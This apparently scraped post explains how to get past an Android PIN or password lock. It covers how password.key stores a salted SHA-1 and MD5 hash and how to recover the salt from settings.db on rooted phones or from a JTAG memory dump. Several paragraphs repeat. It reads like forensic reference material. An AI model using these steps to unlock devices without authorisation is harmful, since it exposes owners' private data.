As you may know it is possible to get around the pin and password lock
on an Android smartphone. In this post we will describe the following
two ways to get around it:
Some Background Information
Since version 2.2 Android provides the option of a numeric PIN or alphanumeric password as an alternative to screen lock. Both pass phrases are required to be between 4 and 16 digits or characters in length.
Android stores this pattern in a special file called password.key in /data/system/. As storing the pattern in plain text wouldn't be very save, this time Android stores an salted SHA1-hashsum and MD5-hashsum of the PIN or password. The numeric PIN and the alphanumeric passwords are processed in the same way (see the following code snippet).
- on a rooted smartphone
- with the help of the JTAG interface
Some Background Information
Since version 2.2 Android provides the option of a numeric PIN or alphanumeric password as an alternative to screen lock. Both pass phrases are required to be between 4 and 16 digits or characters in length.
Android stores this pattern in a special file called password.key in /data/system/. As storing the pattern in plain text wouldn't be very save, this time Android stores an salted SHA1-hashsum and MD5-hashsum of the PIN or password. The numeric PIN and the alphanumeric passwords are processed in the same way (see the following code snippet).
public
byte
[] passwordToHash(String password) {
if
(password ==
null
) {
return
null
;
}
String algo =
null
;
byte
[] hashed =
null
;
try
{
byte
[] saltedPassword = (password + getSalt()).getBytes();
byte
[] sha1 = MessageDigest.getInstance(algo =
"SHA-1"
).digest(saltedPassword);
byte
[] md5 = MessageDigest.getInstance(algo =
"MD5"
).digest(saltedPassword);
hashed = (toHex(sha1) + toHex(md5)).getBytes();
}
catch
(NoSuchAlgorithmException e) {
Log.w(TAG,
"Failed to encode string because of missing algorithm: "
+ algo);
}
return
hashed;
}
Due to the fact that the hash is salted this time, its unfeasible to
crack the password with help of a dictionary attack. For cracking the
password it is important to get the salt and enough time for attempting a
brute force attack. The salt is a string of the hexadecimal
representation of a random 64-bit integer. To get this salt, there are
two ways from which you can choose.
On a Rooted Smartphone:
If you deal with a rooted smartphone and USB debugging is enabled, cracking of the pattern lock is quite simple. You just have to dump the file /data/system/password.key and the salt, which is stored in a SQLite database under the lockscreen.password_salt key. The corresponding database can be found in /data/data/com.android.providers.settings/databases and is called settings.db (see the figure below). After you got both information you just need to start brute forcing the password.
With the Help of the JTAG Interface:
If you deal with a stock or at least unrooted smartphone this whole process is a bit more complicated. First of all, you need special hardware like a Riff-Box and an JIG-adapter or some soldering skills. After you have gained a physical dump of the complete memory chip the chase for the password lock can start. To find the hashsums of the passphrase you need to have the following points in mind:
Using this information we can create two rulesets to find the position of the salt as well as the actual salt (refer to the figure below for a better understanding):
If you deal with a rooted smartphone and USB debugging is enabled, cracking of the pattern lock is quite simple. You just have to dump the file /data/system/password.key and the salt, which is stored in a SQLite database under the lockscreen.password_salt key. The corresponding database can be found in /data/data/com.android.providers.settings/databases and is called settings.db (see the figure below). After you got both information you just need to start brute forcing the password.
With the Help of the JTAG Interface:
If you deal with a stock or at least unrooted smartphone this whole process is a bit more complicated. First of all, you need special hardware like a Riff-Box and an JIG-adapter or some soldering skills. After you have gained a physical dump of the complete memory chip the chase for the password lock can start. To find the hashsums of the passphrase you need to have the following points in mind:
- The dump of the memory is broken into chunks of 2048 bytes
- The password.key file contains two hashes, together 72 bytes long:
- a SHA-1 hash (20 bytes long)
- a MD5 hash (16 bytes long)
- These hashes only contain the characters 0-9 and A-F
- The following 1960 bytes of the chunk are zeros
- The remaining 16 bytes of the chunk are random
Using this information we can create two rulesets to find the position of the salt as well as the actual salt (refer to the figure below for a better understanding):
- Search for the string "lockscreen.password_salt".
- The byte directly in front has to be between 0x0F and 0x35. This byte represents the length of our salt and is called byteA for a better understanding of the rest of this article.
- In front of this byte, there has to be a byte with 0x3D (indicates a serial type representing a string with a length of 24). This is the length of our string we searched for.
- In front of this byte has to be a zero byte
- Decoding byteA gives us the length of the salt and has to between 1 and 20 bytes.
- Now we have to extract this amount of bytes directly after the string "lockscreen.password_salt"
- These bytes are the salt!